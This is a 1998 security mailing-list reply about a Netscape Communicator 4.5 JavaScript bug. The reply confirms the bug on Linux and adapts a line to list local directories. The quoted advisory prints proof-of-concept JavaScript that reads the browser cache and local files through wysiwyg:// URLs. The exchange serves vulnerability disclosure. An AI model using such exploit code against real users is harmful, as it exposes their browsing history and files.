Re: Javascript bug in Netscape Communicator 4.5

[tool () SNIPER ORG (Ryan Gray)]

Hello,
        Just wanted to add that Netscape Communicator 4.5b2 on Slackware
Linux 3.5 (kernel 2.0.34) is susceptible to this also.  I was able to get
the script to read my cache.  As for the local reading, with a little
modification, it'll do that to.

Example:
the line in George's script that reads local files is -
sl=window.open('wysiwyg://1/file:///c|/');

With just little change, taking the Linux directory structure into
consideration and adding proper backslash escapes -
sl=window.open('wysiwyg://1/file://\/');

That'll give you listing of '/' on the local box. (tsk, tsk, tsk)

Regards,
Ryan Gray
http://www.sniper.org - Home of the Afterlife



On Wed, 28 Oct 1998, Georgi Guninski wrote:

> There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95
> (probably others) which allows reading user's cache (the urls the user
> has
> visited, including the info in GET forms). Reading local directories
> content
> is also allowed. This info may be sent to an arbitrary host.
> The bug may be exploited by email.
>
> Demonstration is available at:
>  Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html
>  Directory reading:
> http://www.geocities.com/ResearchTriangle/1711/b5.html
>
> The javascript code is:
>
> sl=window.open('wysiwyg://1/about:cache');
> //For Netscape 3.04 remove 'wysiwyg://1/'
> sl2=sl.window.open();
> sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here
> are some links from your cache:\"; for(i=0;i<5;i++)
> x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
> sl2.location.reload();
>
> Workaround: Disable Javascript.
>
> Regards,
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711/
>
>
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com